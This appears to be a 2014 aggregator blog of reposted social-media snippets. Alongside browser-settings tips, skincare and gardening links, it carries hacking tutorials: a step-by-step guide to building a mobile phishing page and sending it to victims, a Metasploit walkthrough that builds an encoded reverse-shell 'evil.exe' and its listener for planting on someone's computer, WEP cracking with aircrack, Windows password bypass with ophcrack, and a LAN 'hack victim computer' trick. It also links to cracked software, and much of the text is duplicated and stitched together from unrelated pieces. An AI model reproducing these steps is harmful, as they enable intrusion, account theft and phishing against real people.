Tuesday, December 30, 2014

http://www.makeuseof.com/tag/ultimate-browser-settings-must-change-items-chrome-firefox-internet-explorer/

http://www.makeuseof.com/tag/ultimate-browser-settings-must-change-items-chrome-firefox-internet-explorer/

Every few months or so, I uninstall and then reinstall all of the browsers on the PC and MacBook. I do this mainly because browsers tend to fill up with crud eventually, and they slow down to the point where they are unusable. So I delete the whole lot, user profiles, extensions, and all, and start again – after backing up my bookmarks of course. It would be a disaster if I lost the bookmarks.

When reinstalled, there are always some settings that get changed first. Things that would make the browser unusable for me if they weren’t changed. Today, let’s take a look at those must-change browser items. Maybe you do the same, or perhaps you think that the settings should be different?

Google Chrome

 

 

I start with the browser I use the most. Chrome is my work browser first and foremost, so I am always ensuring that things are running along smoothly. Otherwise my productivity suffers, my words are not typed out, and my fans wail in despair. Yes, it’s not pretty.

The first step is to make sure that not too many extensions are running. I try to keep it to an absolute maximum of 15, although I aim for 10. More than 15, and it will be crawling along like Ernie the asthmatic snail, as I also keep lots of tabs open. Your opinions on this may differ and I would be happy to hear what you have to say about this in the comments. Can Chrome run with 15+ extensions?

 

 

Once I have done the extensions, it’s time to move on to the “Settings“, the engine room of the browser. I change the following as a matter of priority :

  • I sign in with my Google account to start syncing everything, although recently Google has been making total mincemeat of my bookmarks, duplicating them, triplicating them even. Anyone else experiencing this? Any easy fixes?
  • I change the “On Startup” option to “Continue Where You Left Off“. Why? Because there’s nothing more irritating than the browser closing and you’ve lost 20+ tabs.

 

 

  • I set up “Guest Browsing” for when people want to use my browser. The last thing I want them to see is my collection of David Hasselhoff webpage links. Oh, the shame if I am caught! Setting up Guest Browsing enables someone to use the browser while not accessing any of my settings. “I’m just looking for freedom….I’m just looking for love….”.

Now open up the “Advanced Settings” and let’s tinker about in there, because there are things in there that need fixin’.

  • The “Privacy” section is a biggie and deserves some time to go through it. As you can see from the screenshot below, I take advantage of all the features, except for the two that call home to the Google mothership. “ET…..definitely NOT call home” from my browser.

 

 

  • Now open Content Settings. and scroll down to Location. Make sure it is set to the following:

chromelocation

 

 

Unless of course you like being tracked by shadowy government agencies, in which case switch it off completely.

Opinion is divided over whether you should trust your browser to store your passwords, or whether you should use a third party client, such as KeePass orLastPass. I personally prefer that the browser stores them – less hassle that way, and they are synced to my other Chrome browsers. My computers are protected with a password. If you break into my house, manage to get past the dog who likes to eat burglars, and crack the password, then you are welcome to the passwords – you’ve more than earned it. The dog takes no prisoners.

 

 

Finally there is Google Cloud Print, which we have covered in-depth back in 2012. Some of you may find GCP useful, some of you may not. I personally use it so I set it up as a matter of course. But it is entirely optional.

The rest of the options can be tweaked later, including the Chrome:Flags page (I’m a sucker for experimental stuff). But right now, those are the only options I need changing to start work.

Mozilla Firefox

 

 

Now onto my backup browser, which I use for signing into websites under new accounts, as well as using the superior “Down Them All” extension, which puts all other mass downloading apps to shame. I love downloading useful stuff such as eBooks (such as Project Gutenberg), MP3s (the legal kind), old movies (again, the legal kind – check out the Internet Archive) and pictures of old stuff. And throughout my downloading adventures, nothing has come close to beating “Down Them All”. Just apply the filters you want, the app scans the page, and downloads the stuff you specified.

Now, on to the settings. At the end of each recommendation below, I have specified in brackets which category you will find that option.

 

 

    • Decide what you want to do when the browser starts up. Again, I would like the browser to remember my last tabs and open them automatically (General)
    • Specify your download folder. You don’t want your porn to disappear into some Windows Explorer black hole (General).
    • Open New Windows In A New Tab Instead. Check that baby off because tabs are just really cool (Tabs).
    • Don’t Load Tabs Till Selected – this will help conserve memory (Tabs)
    • Choose your search engine. I choose DuckDuckGo, due to privacy issues. I know, I use Chrome and I distrust Google search. I am a very complex enigma (Search).

 

 

  • In the tracking section, choose that you do not want hacking, tracking, bugged, listened in to, the whole lot (Privacy).
  • In the passwords section, decide if the browser should remember the passwords. I chose “yes” (Security).
  • Everything in “Advanced” is optional as far as I’m concerned, apart from perhaps the “General” sub-category.

Internet Explorer

‪#‎Facebook‬ Hacking

 

‪#‎Facebook‬ Hacking :Using Android 'Same Origin Policy' Vulnerability (‪#‎isoeh‬) still unpatched! Default web browser users of Android OS (lower to 4.4) are vulnerable to attack running on a large number of Android devices that allows an attacker to bypass the Same Origin Policy (SOP). The Android Same Origin Policy (SOP) vulnerability (CVE-2014-6041) allows one website to steal data from another. Facebook users can be easily targeted by cyber attacks to exploit this flaw in the web browser because the Metasploit exploit code is publicly available! What is the SOP? Built to to protect users’ browsing experience. It is designed to prevent pages from loading code that is not part of their own resource, ensuring that no third-party can inject code without the authorization of the owner of the website. Drawback: SOP has been the victim of ‪#‎Cross‬-Site scripting vulnerability in older versions of Android smartphones that helps attackers to serve the victims a malicious JavaScript file stored in a cloud storage account. Attack vector: ->The crafted page contains obfuscated ‪#‎JavaScript‬ code, which includes an attempt to load a Facebook URL in an inner frame. ->User sees only a blank page as the page’s ‪#‎HTML‬ has been set not to display anything via its div tag ->Inner frame has a size of one pixel! JavaScript code could allow an attacker to perform various tasks on the victim’s Facebook account, on behalf of the legitimate account holder. Post hacking the account, attacker can: ~ Adding Friends ~ Like and Follow any Facebook page ~ Modify Subscriptions ~ Authorize Facebook apps to access the user’s public profile, friends list, birthday information, likes. ~ To steal the victim’s access ‪#‎tokens‬ and upload them to their server. ~ Collect analytics data (such as victims’ location, HTTP referrer, etc.) using the legitimate service. What's more bad! The SOP vulnerability resides in the browser of the Android devices, which can't be uninstalled because it's usually part of the operating system in-build feature. Just Disable the ‪#‎BROWSER‬ from your Android devices by going to Settings > Apps > All and looking for its icon. By opening it, you’ll find a DISABLE button, Select it and disable the Browser
.

AUTO FRIEND REQUEST

 

AUTO FRIEND REQUEST !!! »Steps to get 5000 friend requests on Facebook in One day. »open your Facebook Account. » Now go to Facebook/mass Add Application. » Now Just Login with that application for get information. »Select your friends interest inselect friends you want to add »Now Click on Generate Button »After This you will see many friends Email . Just Copy All. »Now go on Invite Friends PHP. You can go directly on invite friends. »Now Paste all email there and write any message like "ADD ME" »Wait for some time, After some time you will getting start friends request. »Its Done… You can generate more emails but please use only one time in A Day to prevent the blocking of your account.

http://www.techingspot.tk/2014/12/crash-your-friends-whatapp-remotely.html

http://www.techingspot.tk/2014/12/crash-your-friends-whatapp-remotely.html

http://pastebin.com/AFdwff1t

 

http://school-tn9.blogspot.ro/2014/12/bat-exe.html

http://school-tn9.blogspot.ro/2014/12/bat-exe.html

 

cal

CALENDAR ORTODOX 2015: Când pică Paştele şi celelalte mari sărbători religioase - Inedit, WOW

http://teotrandafir.com/calendar-ortodox-2015-cand-pica-pastele-si-celelalte-mari-sarbatori-religioase/

http://teotrandafir.com/calendar-ortodox-2015-cand-pica-pastele-si-celelalte-mari-sarbatori-religioase/

 

Security TIPS for Facebook Users:

 

Security TIPS for Facebook Users: 1. Always use a small resolution Picture as Profile Pic. 2. Goto Privacy Settings.. ->Connecting on Facebook-> Check all options for Friends Only and For FRIEND LIST->ONLY ME 3. Sharing on Facebook-> All set as Friends Only even Albums/Videos should be friends only. For Contact information -> lock Email and Mobile Phone-Only ME. Never show your email and mobile on Facebook. 4. for Mobile protection to save your profile from hacking www.facebook.com/mobileprotection give a permanent No of your father or mother dont give a prepaid temp. no. which keeps on changing. 5.Privacy Setting-> Application/Games/Websites-> Public Search->Remove Tick from Enable Instant Personalisation-> Remove tick from enable Games/Activity-> Only Me Remove Suscipious Applications from Application List. 6. Account Settings->Account Security-> Tick on Always use https, Send Login Notification/ approvals on Cell/Email Enable it. 7. Dont Click on suspicious links with Tiny URLs like http://ow.in/ etc... all are fake and fraud 8. Dont click on any link of email to access facebook. 9. Always type https://www.facebook.com/ to login 10. Dont Use third party apps for chatting on facebook on mobile.

EW. Blackheads are just pimples that don't have skin over them. 15+ Ways to Get Rid of Blackheads: http://www.wikihow.com/Get-Rid-of-Blackheads

 

EW.

Blackheads are just pimples that don't have skin over them.

15+ Ways to Get Rid of Blackheads: http://www.wikihow.com/Get-Rid-of-Blackheads

Sothink Logo Maker Pro Version 4.4 Build 4595 Patch upgrade complete. Now you can download the software + Patcher Fix 2 : https://www.mediafire.com/folder/8310i8x8b5j82/SLMP_Patcher

Sothink Logo Maker Pro Version 4.4 Build 4595 Patch upgrade complete. Now you can download the software + Patcher Fix 2 : https://www.mediafire.com/folder/8310i8x8b5j82/SLMP_Patcher

Sothink Logo Maker Pro Version 4.4 Build 4595 Patch upgrade complete. Now you can download the software + Patcher Fix 2 : https://www.mediafire.com/folder/8310i8x8b5j82/SLMP_Patcher

http://www.sitepoint.com/debugging-xdebug-sublime-text-3/

http://www.sitepoint.com/debugging-xdebug-sublime-text-3/

 

Monday, December 29, 2014

Palm Reading

 

Palm Reading? Here's a breakdown of Palm Line specifics! Read Palm Lines: http://www.wikihow.com/Read-Palm-Lines

http://www.techworm.net/2014/12/facebook-hacking-by-injecting-xml.html

http://www.techworm.net/2014/12/facebook-hacking-by-injecting-xml.html

 

http://lifehacker.com

 

Cum intri intr-un calculator fara sa stii parola. Este socant de simplu. Uneori, vrei sa folosesti un calculator chiar daca nu ii stii parola, si aici exista cateva situatii legitime, nu doar povesti cu hackeri care fura date si identitati. Cei de la Lifehacker.com au publicat doua filmulete, unul pentru PC si un altul pentru Mac, care te pot ajuta sa intelegi mai bine ce ar face un hacker daca s-ar trezi cu calculator tau in brate. Baietii iti mai recomanda sa incerci schema macar o data, ca sa stii sa o folosesti in cazul in care ti-ai uitat parola si trebuie urgent sa trimiti pe mail un document. Vei vedea din cele doua filmulete ca este socant de usor sa spargi o parola. Sub nicio forma nu iti recomandam sa folosesti aceste informatii in scopuri malefice. Iata cat este de simplu sa spargi un PC. In postarea de maine revenim cu filmuletul pt MAC.

The most dangerous hacking groups in the world

 

From ‪#‎Anonymous‬ to ‪#‎Lizard_Squad‬: The most dangerous hacking groups in the world ------------------------------------------------------------------------------------- Lizard Squad, which took down PSN and Xbox Live have openly announced their new target – Tor. Tor is a network that works at keeping your online identity anonymous and the hacking group already had already added thousands of relays. Now, Lizard Squad sounds creepy anyway, but there are several others calling themselves cuddly names like ‘Kitten’ and ‘Panda’ and are equally dangerous. Let’s take a quick look at some of the most dangerous hacking groups in the world. #Anonymous Anonymous needs no introduction. Founded in 2003, the hacking group pops its head anywhere Internet censorship prevails. Just a couple of years ago, we saw the infamous group emerge in India to fight against Internet censorship being imposed on netizens. From bringing down the Congress and the Supreme Court websites in retaliation to India’s new Internet laws and the blocking of websites like The Pirate Bay and Vimeo to hacking BJP and its websites, the group has been quite active in India. In the past, we’ve seen the US bring criminal charges against suspected members of the hacking group for allegedly attacking government, credit card and lobbying websites in a campaign in support of internet file-sharing. Last year it hacked Strait Times for a misleading article and just recently threatened a major blackout of Chinese and Hong Kong government websites ‪#‎Team_cyber_warriors‬: From celebrities to government websites, ‘hacking’ or ‘cyber crime’ isn’t a thing of the west anymore. Over the past couple of years, we’ve seen several such incidents in India too. Recently, a group calling itself ‘Team Cyber warriors’ emerged that went on to deface celebrity websites like the South superstar Mohanlal with a disturbing message and Pakistan’s flag. The same group went on to hack the Press Club of India website. It was a retaliation by Cyber Warriors against the hacking of the Pakistan People’s Party by alleged Indian hacker group called Black Dragon. With the tensions happening across the border, hackers have started their own battle in the virtual world, too. ‪#‎Chaos_Computer_Club‬: Now, hacking isn’t a thing of the modern world either. The hacking group Chaos Computer Club was formed in Germany in 1981. The group became popular on hacking into the German Bildschirmtext computer network and stealing 134,000 Deutsch Marks from a Hamburg bank. It wasn’t for money as they returned it the next day and showed how the security system was flawed. Some group members were also known to hack into corporate and government computers in the US during late 80s. They’ve also used hacking to retaliate against French nuclear testing. ‪#‎LulzSec‬: Lulzsec, a group that enjoys exposing security flaws, has been active since 2011. It’s motto is ‘laughing at your security’. The hacking group has targeted popular sites like Fox.com, X-factor database, Sony, the CIA and others. In 2012, some LulzSec members were arrested including their leader apparently codenamed Sabu. However, within three months, the group announced that it is active again. Lulzsec is responsible for causing billions of dollars worth of damages to sites. ‪#‎Syrian_Electronic_Army‬ or ‪#‎Deadeye_Jackal‬ The Syrian Electronic Army or called ‘Deadeye Jackal’ by the CrowdStrike is a political activist group supporting the Syrian President Bashar Assad. It had hacked into scores of websites starting late last year to early this year, especially in the US media. From the Associated Press and Financial Times’ Twitter accounts to CNN’s Facebook and Twitter pages, none has been spared. The group also posted the contact information of Steve Ballmer, Microsoft Corp’s retiring chief executive, on its Twitter account along with the message, “You can thank Microsoft for monitoring your accounts/emails using this details. ‪#‎SEA‬.” That message was an apparent reference to revelations last year by former National Security Agency contractor Edward Snowden that Skype, which is owned by Microsoft, was part of the NSA’s program to monitor communications through some of the biggest U.S. Internet companies. ‪#‎Derp‬ Derp is infamous for taking down several gaming sites in late 2013. It took down multiple gaming sites and servers through DDoS attacks. The group managed to take down Riot Games’ League of Legends, Dota 2, Club Penguin, servers. They also took down Battle.net and EA.com. ‪#‎Magic_Kitten‬ The hacking group Magic Kitten is from Iran. Believed to be existing from 2009, it targets political dissidents in Iran and is known for its attacks in November 2013. Some other hacking groups include Numbered Panda from China known to send phishing emails and cyber threat from Russia called Energetic Bear.

http://portableappz.blogspot.ro/2012/12/notepad-623-multilingual.html

http://portableappz.blogspot.ro/2012/12/notepad-623-multilingual.html

 

https://www.youtube.com/watch?v=6JusucBYehQ&feature=youtu.be&a

https://www.youtube.com/watch?v=6JusucBYehQ&feature=youtu.be&a

 

How to Enable Reader Mode in Google Chrome and Mozilla Firefox

 

How to Enable Reader Mode in Google Chrome and Mozilla Firefox ... Reader Mode clear all cutters and junk in your browser. With reader mode you can read your article clearly. Reader mode show only webpages post and clear all widgets and ad on website. Reader Mode comes in all browser, In this post I tell you How can you activate or use this service in your browser. Many Browser give you reader by default like Google Chrome and Maxthon. If you want Reader Mode in Mozilla PC Web Browser you need to download add-on. Evernote Clearly This add-on and extension is created by Evernote. Evernote Clearly removes all type of advertisements and distractions from website and give you clear webpage for reading your articles. Clearly is made by Evernote, so you can save your articles on Evernote for reading later.Clearly make your web experience more enjoyable. Clearly is available for Google Chrome and Mozilla Firefox. Download Evernote Clearly for Google Chrome https://chrome.google.com/…/iooicodkiihhpojmmeghjclgihfjdjh… Download Evernote Clearly for Mozilla Firefox https://addons.mozilla.org/en-US/firefox/addon/clearly/ In Google Chrome this feature in default so you can use reader mode in Google without installing any type of extension. Below Picture you see reader mode button. Click on that button and enjoy reader mode..

|Make a pishing page on mob

 

|Make a pishing page on mob 1.goto HTTP:// wapka.mobi/ 2.make an account there 3.create site 4.go to manage it 5.go to admin mode 6.go to edit site 7.go to wml/xhtml 8.open new tab in browser 9.open this link Photo http://pastebin.com/ CrSnea98 Copy the full code of first box don't copy the raw data 10.paste it in the wml/ XHTML box 11.submit 12.your phishing page done 12.now see the URL box ur site is your phishing link Now make short link. Go. HTTP://gg.gg/ Paste your link and make short then send Photo your victims Happy hacking

Sunday, December 28, 2014

http://school-tn9.blogspot.fr/2014/12/ccleaner.html

http://school-tn9.blogspot.fr/2014/12/ccleaner.html

 

http://www.wikihow.com/Treat-Oily-Skin-with-Tomatoes

http://www.wikihow.com/Treat-Oily-Skin-with-Tomatoes

 

https://www.youtube.com/watch?v=khU1sCfDJhA

https://www.youtube.com/watch?v=khU1sCfDJhA

 

http://youtu.be/BqPmG4zfwVo

http://youtu.be/BqPmG4zfwVo

http://www.gulfup.com/?uRQCjQ

 

https://userscloud.com/bsremvrmg110

https://userscloud.com/bsremvrmg110

 

http://youtu.be/3XgBiQd7PN0

http://youtu.be/3XgBiQd7PN0

http://www.gulfup.com/?2012q9

 

https://www.youtube.com/watch?v=lTkf7kEMD2k&feature=youtu.be

https://www.youtube.com/watch?v=lTkf7kEMD2k&feature=youtu.be

 

http://www.glumite.ro

http://www.glumite.ro

 

http://khalil-shreateh.com/khalil.shtml/index.php/facebook/facebook-paid-scripts/185-facebook-id-s-scraper-custom-ad-s-audiences.html?showall=1

http://khalil-shreateh.com/khalil.shtml/index.php/facebook/facebook-paid-scripts/185-facebook-id-s-scraper-custom-ad-s-audiences.html?showall=1

 

any one want premium link genrater of these websites free 1fichier.com 1st-files.com 2shared.com 4share.vn 4shared.com adrive.com alldebrid.com asfile.com bayfiles.net billionuploads.com bitshare.com catshare.net chiasenhac.com cloudzer.net clz.to cramit.in crocko.com cyberlocker.ch czshare.com d-h.st d01.megashares.com dailymotion.com datafile.com datafilehost.com ddlstorage.com demo.ovh.eu depfile.com depositfiles.com depositfiles.net depositfiles.org dfiles.eu dfiles.ru dizzcloud.com dl3.junocloud.me dropbox.com easy-share.com easybytez.com egofiles.com exclusivefaile.com expressleech.com extabit.com fastshare.cz file1.info file4sharing.com filebox.com filechin.com filecloud.io filefactory.com filegagpro.com filemarkets.com fileom.com filepost.com files2upload.net filesflash.com filesmonster.com filestay.com filestoragepro.net filevice.com filezy.net firedrive.com fireget.com fp.io freakshare.com fshare.vn furk.net gamefront.com gigasize.com hipfile.com hostingbulk.com hotfile. com hugefiles.net ifile.it isavelink.com junocloud.me k2s.cc keep2share.cc lafiles.com letitbit.net longfiles.com lumfile.com me.zing.vn mediafire.com mega.1280.com megashares.com metacafe.com mightyupload.com mixshared.com mixturecloud.com mp3.zing.vn mup5.com netload.in nirafile.com nitrobit.net novafile.com novamov.com nowdownload.ch oteupload.com pandamemo.com playlist.chiasenhac.com plunder.com premiumize.me purevid.com putlocker.com queenshare.com rapidfileshare.net rapidgator.net rapidshare.com rarefile.net redload.net rg.to rghost.net rodfile.com ryushare.com safeshared.com sanshare.com secureupload.eu sendspace.com share-online. biz share.vnn.vn shareblue.eu shareflare.net sharerepo.com sockshare.com solidfiles.com spicyfile.com stagevu.com terafile.co tune.pk turbobit.net tusfiles.net tuxfile.com ul. to ultramegabit. com up.4share.vn upafile.com upfile.mobi upfile.vn uploadable.ch uploadbaz.com uploadboy.com uploaded.net uploaded.to uploadhero.co uploading.com uploadjet.net uploadstation.com uppit.com uptobox.com verzend.be videomega.tv wipfiles.net yfdisk.com youtube.com yunfile.com

This summary is not available. Please click here to view the post.

Metasploit...

 

***************************Metasploit Payload******************************* ---------------------------------------------------------------------------------- What exactly is metasploit? Metasploit is a framework used for storing, deploying, and creating exploits. An exploit is a piece of code which can interact with other programs to let the attacker (you) execute bits of code on the victims computer. It also has a wonderful tool known as msfpayload. What is msfpayload? msf payload is used in conjunction with msfcli and msfenocde. Together, they are a set of tools which creates a file that connects back to your computer, encodes the file, and sets up a listener for said file. This method completely bypasses the need for exploits, but requires social engineering skills to somehow get your file on their computer and for them to execute it. (or just sneak a flash drive in while their not looking and execute it for them, but I don't recommend that.) Sounds great right? so how do you do it? ||Tutorial starts here|| I will be using Backtrack 5 R3, and using msfconsole. To start it off, update msf by starting a terminal and running "msfupdate". It will say "Updated to revision #####" when finished. Now execute "msfconsole" (which will take a few moments to load. After it shows the msf banner, it will give you the msf prompt "msf >. Type "show payloads". This gives you a list of all the payloads available. We are going to use windows/meterpreter/reverse_tcp Type "use windows/meterpreter/reverse_tcp" and it will bring you into that module. type "info" to see what options are required and other useful information. We see that there are three options needed, EXITFUNC, LHOST, and LPORT. EXITFUNC is just how the program will show up on windows, don't really need to care about that. LHOST is your IP address, so the program will know where to connect back to, and LPORT is the port it will connect back on. EXITFUNC and LPORT already have default values placed in them, which work fine and we don't need to change. LHOST on the other hand, does need an option. This is your IP address. If you are performing this over a LAN network, then you just need your LAN IP, such as 192.168.2.5. If you are performing this over WAN, use your WAN address and have correct port forwarding (and pray nobody traces it back to you). We set LHOST by typing "set LHOST 192.168.2.5". If we run "info" again it shows our LHOST as the ip we put in. So with all that in order, now we just type "generate -e x86/shikata_ga_nai -i 30 -t exe -f evil.exe" which will create the file in your Home folder. Take that file, and copy it on to a flash drive. Now for the second part (much quicker then the first). Go back to your terminal and type "back", to be brought back to the main msf menu. We are going to use the handler to listen for connections, so type "use exploit/multi/handler" to set the module. Now to set the options, type exactly in the following in order: set PAYLOAD windows/meterpreter/reverse_tcp (the payload we generated earlier) set LHOST 192.168.2.5 (your ip address, whatever that may be) set LPORT 4444 (the default port) exploit and the handler is started. When somebody executes that file we made earlier, it connects back to your computer, and the listener we just created handles that connect back. When somebody executes it, you will have a session created. Just type "sessions 1" and you will connect.

 

***************************Metasploit Payload******************************* ---------------------------------------------------------------------------------- What exactly is metasploit? Metasploit is a framework used for storing, deploying, and creating exploits. An exploit is a piece of code which can interact with other programs to let the attacker (you) execute bits of code on the victims computer. It also has a wonderful tool known as msfpayload. What is msfpayload? msf payload is used in conjunction with msfcli and msfenocde. Together, they are a set of tools which creates a file that connects back to your computer, encodes the file, and sets up a listener for said file. This method completely bypasses the need for exploits, but requires social engineering skills to somehow get your file on their computer and for them to execute it. (or just sneak a flash drive in while their not looking and execute it for them, but I don't recommend that.) Sounds great right? so how do you do it? ||Tutorial starts here|| I will be using Backtrack 5 R3, and using msfconsole. To start it off, update msf by starting a terminal and running "msfupdate". It will say "Updated to revision #####" when finished. Now execute "msfconsole" (which will take a few moments to load. After it shows the msf banner, it will give you the msf prompt "msf >. Type "show payloads". This gives you a list of all the payloads available. We are going to use windows/meterpreter/reverse_tcp Type "use windows/meterpreter/reverse_tcp" and it will bring you into that module. type "info" to see what options are required and other useful information. We see that there are three options needed, EXITFUNC, LHOST, and LPORT. EXITFUNC is just how the program will show up on windows, don't really need to care about that. LHOST is your IP address, so the program will know where to connect back to, and LPORT is the port it will connect back on. EXITFUNC and LPORT already have default values placed in them, which work fine and we don't need to change. LHOST on the other hand, does need an option. This is your IP address. If you are performing this over a LAN network, then you just need your LAN IP, such as 192.168.2.5. If you are performing this over WAN, use your WAN address and have correct port forwarding (and pray nobody traces it back to you). We set LHOST by typing "set LHOST 192.168.2.5". If we run "info" again it shows our LHOST as the ip we put in. So with all that in order, now we just type "generate -e x86/shikata_ga_nai -i 30 -t exe -f evil.exe" which will create the file in your Home folder. Take that file, and copy it on to a flash drive. Now for the second part (much quicker then the first). Go back to your terminal and type "back", to be brought back to the main msf menu. We are going to use the handler to listen for connections, so type "use exploit/multi/handler" to set the module. Now to set the options, type exactly in the following in order: set PAYLOAD windows/meterpreter/reverse_tcp (the payload we generated earlier) set LHOST 192.168.2.5 (your ip address, whatever that may be) set LPORT 4444 (the default port) exploit and the handler is started. When somebody executes that file we made earlier, it connects back to your computer, and the listener we just created handles that connect back. When somebody executes it, you will have a session created. Just type "sessions 1" and you will connect.

Tuesday, December 23, 2014

No more excuses! Day 23: Learn to Play an Instrument ‪#‎newyears‬ ‪#‎resolutions‬ http://www.wikihow.com/Learn-to-Play-an-Instrument

 

No more excuses! Day 23: Learn to Play an Instrument ‪#‎newyears‬ ‪#‎resolutions‬ http://www.wikihow.com/Learn-to-Play-an-Instrument

Today, i’m talking about how to hack wifi password

 

Today, i’m talking about how to hack wifi password. Recently, i posted first method to hack wifi password but today i’m posted second method to hack wifi password. First of all, you need to read first method of hack wifi password, then read second method. There is many ideas people share how to hack wifi password but not all are working and which is working that is really very tough to understand so not all people can do that cause that is very difficult s so everybody wants to know How To Hack Wifi Password easily there is tricks to hack that wifi password . How to Hack Wifi Password – Second Method : Hack Wifi With Backtrack Linux window Step 1) Run VMware and open Backtrack iso. Step 2) Open Shell Consol after start Backtrack. Step 3) Type airmon-ng and hit enter. It will show you interface, chipset, driver, etc. Step 4) Type airodump-ng wlan0 and hit enter. Wait a while when it is searching for available connections. Step 5) You can see a list. Chose a hotspot name you want to hack. Step 6) Copy the ch value of your selected connection. Then type airdump-ng-c and past ch value just after this. Next to the ch value type –bssid space your bssid number and -w wep_hack wlan0 and press enter. (Example: airdump-ng-c ch value –bssid 00:1F:9F:73:C0:45 -w wep_ hack wlan0) Step 7) Wait and do not close the window. Step 8) If this window has finished then open a new shell console and type dir and hit enter. Step 9) Type aircrack-ng - a 1 –b and your bssid. (example: aircrack-ng -a 1 -b 00:1F:9F:73:C0:45 wep_ hack-01.cpp) Step 10) If you have seen this text decrypted correctly 100%, it means you have successfully done this process. Now you can see you desired Wi-Fi password just above this message.

Crack windows administrator password

 

++++++++Crack windows administrator password+++++++++++++ OPHCRACK is a linux distro use to break windows password without any hurdle So lets do it Hi all i m Moon baig from IT Expertz So members it depend on you that which windows infront of you that make u mad due to its password restriction like :windows 7/8/vista/xp download ophcrack live cd iso from hare http://ophcrack.sourceforge.net/download.php?type=livecd once You download it *************************Now time to make usb bootable**************************** download universal usb installer from here www.pendrivelinux.com/…/Universal-USB-Installer/Universal-U… 1-open it browse for oph iso file which you'v download first 2-then browse for usb device check on formate usb device *.*Note: All the data on the usb lost during formate 3-click on create you'v Done ********************************************************************************************** boot your system from usb and click on OPH Graphic mode - automati the password shown in the figure as following don't feel hesitate to ask a question

How to covert TXT to Audio without any software

 

How to covert TXT to Audio without any software ======================================== Hey folks, I’m going to introduce you with a simple trick of converting Text to audio without any software. Just follow these easy steps: 1. Open notepad, copy and paste the below code in that notepad. Dim msg, sapi msg=InputBox("Enter your text to convert Audio: ","Text to Audio Converter: Jaydeep Malik") Set sapi=CreateObject("sapi.spvoice") sapi.Speak msg 2. Now go to menu – file and click on save as. 3. Now named that file (like: 123.vbs) make sure that before clicking save button select the all files in the combo box. 4. Now open the file, write your text into it and press enter. Now the magic begins enjoy and don't forget to share this trick

Monday, December 22, 2014

Hack Victim Computer

 

Hack Victim Computer...... Hack Victim Computer Coming Up >> Hack Computer via Trojans & Keyloggers... How To Hack & Access Same LAN Computers ? If you are working in Office / Colleges and want to hack your friends & college mate PC then here is a trick. First Step press win + R Go to Run> Type Cmd now type command net view It will be look as below C:\>net view Server Name Remark --------------- --------------- --------------- -- \\xyz \\abc Here you can get all the names of all the computers machine names which connect with your LAN. Now you got the name. Lets start hacking into the systems. After you get server name now type tracert command for knowing IP of the victim machine. Example: C:\> tracert xyz Here you get the IP address of the XYZ computer machine. Now go to windows start button and type Remote Desktop Connection After click on Remote Deskto Connection you get below image.. Now type the IP address or computer name of victim machine. Click on Connect <-| It will also ask administrator password which is common as usual you known about. After few second Victim machine shown in your Computer.. Now you can access that machine to open website, files, Software's, etc Enjoy the trick..

Sunday, December 21, 2014

https://www.youtube.com/watch?v=FZyUCB71E7M

https://www.youtube.com/watch?v=FZyUCB71E7M

https://www.youtube.com/watch?v=FZyUCB71E7M

Gardening can be easier... While benefitting your local ecosystem! Consider Native Plants while Growing a Sustainable Garden: http://www.wikihow.com/Grow-a-Sustainable-Garden

 

Gardening can be easier... While benefitting your local ecosystem! Consider Native Plants while Growing a Sustainable Garden: http://www.wikihow.com/Grow-a-Sustainable-Garden

I am Once Again Back With Lots of 100% Working

I am Once Again Back With Lots of 100% Working Tricks For Each And Everyone... All The tricks At One Place. Hurray. 1-Crack WIFI Password 100% Working Trick http://genuinetricksonly.blogspot.com/…/cracking-wifi-wpawp… 2-Very Useful Softwares For PC/Laptops All In One http://genuinetricksonly.blogspot.com/…/very-useful-softwar… 3-Hack FB Password Easily http://genuinetricksonly.blogspot.com/…/hack-facebook-accou… 4- FB + Gmail Phishing Trick http://genuinetricksonly.blogspot.com/…/facebook-gmail-phis… 5- Recover Lost And Deleted Data On Android Mobile Easily http://genuinetricksonly.blogspot.com/…/how-to-recover-dele…

I am Once Again Back With Lots of 100% Working Tricks For Each And Everyone... All The tricks At One Place. Hurray. 1-Crack WIFI Password 100% Working Trick http://genuinetricksonly.blogspot.com/…/cracking-wifi-wpawp… 2-Very Useful Softwares For PC/Laptops All In One http://genuinetricksonly.blogspot.com/…/very-useful-softwar… 3-Hack FB Password Easily http://genuinetricksonly.blogspot.com/…/hack-facebook-accou… 4- FB + Gmail Phishing Trick http://genuinetricksonly.blogspot.com/…/facebook-gmail-phis… 5- Recover Lost And Deleted Data On Android Mobile Easily http://genuinetricksonly.blogspot.com/…/how-to-recover-dele…

Introduction to security and ethical hacking-part 4 In this session,we will learn about cryptographic fundamentals

 

